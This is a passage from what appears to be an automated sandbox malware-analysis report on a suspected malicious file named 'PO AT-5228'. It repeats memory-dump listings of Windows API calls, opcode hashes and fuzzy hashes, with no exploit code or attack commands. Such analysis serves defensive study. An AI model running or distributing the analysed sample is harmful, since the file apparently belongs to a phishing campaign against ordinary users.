                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 0402938fe0f145dade3d7ba62787480531fcd993f50920fc52ccfcdbe67d8e48
                                                                                        • Instruction ID: a9128441bf8b7f5da11b3499c2dabd32c2cccc7f0b24d8dd0a9107f5154ca3f9
                                                                                        • Opcode Fuzzy Hash: 0402938fe0f145dade3d7ba62787480531fcd993f50920fc52ccfcdbe67d8e48
                                                                                        • Instruction Fuzzy Hash: 0D315C71A00A45AFCB08CF6CD480AADB7F6FF49310F158669E82997700D774BDA0CB90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: a22d3ebcc466e5c846a63742b4dbe3114742af2e65b13d021cdcd2e5a99a4fd5
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 7C31A074A001059BD728DF58C490AA9FBE6FF49340B64C6E5E42ECB266DB31EDC1CB90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: 869dc98d17d76e7ca01d553c9e961166343ead96d238c7e9cc6d779ebe115d98
                                                                                        • Instruction ID: f959042a21017bbb476d85f1e730ffd21f0f8f19e28837693f4b3225cb6f1977
                                                                                        • Opcode Fuzzy Hash: 869dc98d17d76e7ca01d553c9e961166343ead96d238c7e9cc6d779ebe115d98
                                                                                        • Instruction Fuzzy Hash: EA316A75204528DFCB05AF14D0D0B6E7BF0EF59320F20849AEA991B386DB74AA05DF82
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: d97b98430391aec62cff91e471ba4e95f777f1038fa601f514bb368d4abec0ce
                                                                                        • Instruction ID: 593e2246f28b5bd9ca006922565fc11404511a7ede39287eda53e687ef54b01c
                                                                                        • Opcode Fuzzy Hash: d97b98430391aec62cff91e471ba4e95f777f1038fa601f514bb368d4abec0ce
                                                                                        • Instruction Fuzzy Hash: 7E414870508641CFDB24DF28C484B2ABBE1FF45304F1989ADE9AA5B362D372E845CF52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3074181302-0
                                                                                        • Opcode ID: 967b755d188130dbe7579c71fe53de167ce7579d2f01a1907ca3039f4fc2cb87
                                                                                        • Instruction ID: f449c0b1b3dfc90f4e6979acbd187614679b8e28afc57ad1c87a0ea3a8795824
                                                                                        • Opcode Fuzzy Hash: 967b755d188130dbe7579c71fe53de167ce7579d2f01a1907ca3039f4fc2cb87
                                                                                        • Instruction Fuzzy Hash: C4216A728446009FD7227FA8C8467583BE1AF4233AF2606E0E4304B1F2DBB4D844DBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B64214: FreeLibrary.KERNEL32(00000000,?), ref: 00B64247
                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B639FE,?,00000001), ref: 00B641DB
                                                                                          • Part of subcall function 00B64291: FreeLibrary.KERNEL32(00000000), ref: 00B642C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load
                                                                                        • String ID:
                                                                                        • API String ID: 2391024519-0
                                                                                        • Opcode ID: f287fed5cc779ee25c13e9e86b0bfe16e1acb3c735e48359d37e5cd71c68e372
                                                                                        • Instruction ID: 617fbfe393d2e689acfd95a7606eff9d753bb90355f95fc3dd2eb85a17521fff
                                                                                        • Opcode Fuzzy Hash: f287fed5cc779ee25c13e9e86b0bfe16e1acb3c735e48359d37e5cd71c68e372
                                                                                        • Instruction Fuzzy Hash: AE110A31610705ABCB14BF70DC56F9E77E99F40B00F208469F596A71D1DF78DA009B60
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: fe86cba0af0f8ea290159ab7f5330f14216cfb207450ddaa5e96cf2a587d6dcc
                                                                                        • Instruction ID: bf6cb6f73d6462de6bc377ff071e410f80dc99fca89a679ded6367586e056016
                                                                                        • Opcode Fuzzy Hash: fe86cba0af0f8ea290159ab7f5330f14216cfb207450ddaa5e96cf2a587d6dcc
                                                                                        • Instruction Fuzzy Hash: E3210A70518701CFDB24DF68C444B2ABBE1FF84304F1589A9E9AA47361D771E845CF52
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00B8AFC0
                                                                                          • Part of subcall function 00B87BDA: __getptd_noexit.LIBCMT ref: 00B87BDA
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1144279405-0
                                                                                        • Opcode ID: 0912a425f47b47eddfebc044e172a030f72b09f710aa1ea074f61d549a20c968
                                                                                        • Instruction ID: 147134143d6a900e466ccad5795befe01f53beea2dd9ab71c54b641870366a60
                                                                                        • Opcode Fuzzy Hash: 0912a425f47b47eddfebc044e172a030f72b09f710aa1ea074f61d549a20c968
                                                                                        • Instruction Fuzzy Hash: E0116D728456009FD7127FB49842B5D7BE1AF41336F2642D0E4345B1F2DBB48941DBA1
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00BFDC00,00000000,?,00B6464E,00BFDC00,00010000,00000000,00000000,00000000,00000000), ref: 00B6C337
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: ced632bc9460a462cc144bf76db2f137b5352dc9265c41f8f2043037fc5a4fb0
                                                                                        • Instruction ID: f2ba87e30671fe7c4131147d95286c93a5221d05e5bfdf008bb0a26b3f82c2f4
                                                                                        • Opcode Fuzzy Hash: ced632bc9460a462cc144bf76db2f137b5352dc9265c41f8f2043037fc5a4fb0
                                                                                        • Instruction Fuzzy Hash: 80111531200B459FD720CE5AC880F6ABBE9EF55754F14C45EE9EA8AA50C7B9EC44CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                        • Instruction ID: 7e85002a20a855e39b4c285449fd577056d890293370cc8d126557772e20b416
                                                                                        • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                        • Instruction Fuzzy Hash: 79013671505109AECF05EFA4C8918EEBFF4EF21344F1080A6B565971A5EB309A49DF60
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00B82AED
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: bc45264666995bc420467f0c596508f2144717a576f66f74da597b39c57560bd
                                                                                        • Instruction ID: 546a3315dc3cfd79e5166f7681227a87a74065be5d0555a2a9eb73fc3a3184e0
                                                                                        • Opcode Fuzzy Hash: bc45264666995bc420467f0c596508f2144717a576f66f74da597b39c57560bd
                                                                                        • Instruction Fuzzy Hash: 88F06D31900605ABDF2ABF648C0679F3BE5BF00725F1584A5F8149B1B1DB78CA52EB51
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00B639FE,?,00000001), ref: 00B64286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: be1c07a95b3b7405024d9af5ceebbdc525055d4896bf6fb16e7ac0e6881116e6
                                                                                        • Instruction ID: 3e39effb51a73849e8da12e4b7496fa546652ccc9a0a6f1ba65549f21809fdf1
                                                                                        • Opcode Fuzzy Hash: be1c07a95b3b7405024d9af5ceebbdc525055d4896bf6fb16e7ac0e6881116e6
                                                                                        • Instruction Fuzzy Hash: 1BF015B1515B02CFCB349F64D8A0856BBE4FF143253348ABEF1D686620C7769844DF50
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00B640C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: 0c88a3b5f07e30303f068444f3df4d024c8662584345642ffac038440f3339c4
                                                                                        • Instruction ID: d8d7264ce119da7e18f34b60511ff26ad290074f360dc4cd7628c56e5ebfda1f
                                                                                        • Opcode Fuzzy Hash: 0c88a3b5f07e30303f068444f3df4d024c8662584345642ffac038440f3339c4
                                                                                        • Instruction Fuzzy Hash: A4E0C2366002245BC711A698CC86FFA77EDDF886A0F0901B5F909EB254DEA4AD819691
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 2638373210-0
                                                                                        • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                        • Instruction ID: 5e9cee0e25a9e01ef3599be8d289360b04516a1ceec96abc5acd865682d2fc9b
                                                                                        • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                        • Instruction Fuzzy Hash: DDE092B0108B449BDB348A24D800BE373E0EB06305F00085DF2EB83242EB627841C759
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00BD40EA,00000000,00000000,00000000), ref: 00B647A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: e836c7a63c1d4fc4d846019e967498f6e20969226406ce5092c727887720be7a
                                                                                        • Instruction ID: e90ac8bb424743feb428c53adefcf76b64a80982e56079a347ea849628c5d1d2
                                                                                        • Opcode Fuzzy Hash: e836c7a63c1d4fc4d846019e967498f6e20969226406ce5092c727887720be7a
                                                                                        • Instruction Fuzzy Hash: 75D0C974640208BFEB04CB91DC86F9A7BBCEB04718F600194F600AA2D0D6F2BE408B55
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: d2169cc1755888a4df458d8d6310cfec26cde84963550e3580b6b67e7512072f
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 6FE0E67494010EEFDB00EFB4D54969E7FB4EF04301F100261FD05E2281D6309D508A62
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00BCF87D
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BCF8DC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BCF919
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BCF940
                                                                                        • SendMessageW.USER32 ref: 00BCF966
                                                                                        • _wcsncpy.LIBCMT ref: 00BCF9D2
                                                                                        • GetKeyState.USER32(00000011), ref: 00BCF9F3
                                                                                        • GetKeyState.USER32(00000009), ref: 00BCFA00
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BCFA16
                                                                                        • GetKeyState.USER32(00000010), ref: 00BCFA20
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BCFA4F
                                                                                        • SendMessageW.USER32 ref: 00BCFA72
                                                                                        • SendMessageW.USER32(?,00001030,?,00BCE059), ref: 00BCFB6F
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00BCFB85
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BCFB96
                                                                                        • SetCapture.USER32(?), ref: 00BCFB9F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCFC03
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BCFC0F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00BCFC29
                                                                                        • ReleaseCapture.USER32 ref: 00BCFC34
                                                                                        • GetCursorPos.USER32(?), ref: 00BCFC69
                                                                                        • ScreenToClient.USER32(?,?), ref: 00BCFC76
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BCFCD8
                                                                                        • SendMessageW.USER32 ref: 00BCFD02
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BCFD41
                                                                                        • SendMessageW.USER32 ref: 00BCFD6C
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BCFD84
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BCFD8F
                                                                                        • GetCursorPos.USER32(?), ref: 00BCFDB0
                                                                                        • ScreenToClient.USER32(?,?), ref: 00BCFDBD
                                                                                        • GetParent.USER32(?), ref: 00BCFDD9
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BCFE3F
                                                                                        • SendMessageW.USER32 ref: 00BCFE6F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCFEC5
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BCFEF1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BCFF19
                                                                                        • SendMessageW.USER32 ref: 00BCFF3C
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCFF86
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BCFFB6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BD004B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 2516578528-4164748364
                                                                                        • Opcode ID: 9fb2cbff531c5bc148485ae3d691ac68699eaaeac005323b61e0635ea3f648f4
                                                                                        • Instruction ID: a4f6a18a383b61ddc13dce76f611df4590d486bcae97abb683c853cc668869ba
                                                                                        • Opcode Fuzzy Hash: 9fb2cbff531c5bc148485ae3d691ac68699eaaeac005323b61e0635ea3f648f4
                                                                                        • Instruction Fuzzy Hash: AC329874604246EFDB20CF24C884FAABBE6FB49354F1806AEFA95872A1C771DC05CB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BCB1CD
                                                                                        Strings
                                                                                        Memory Dump Source
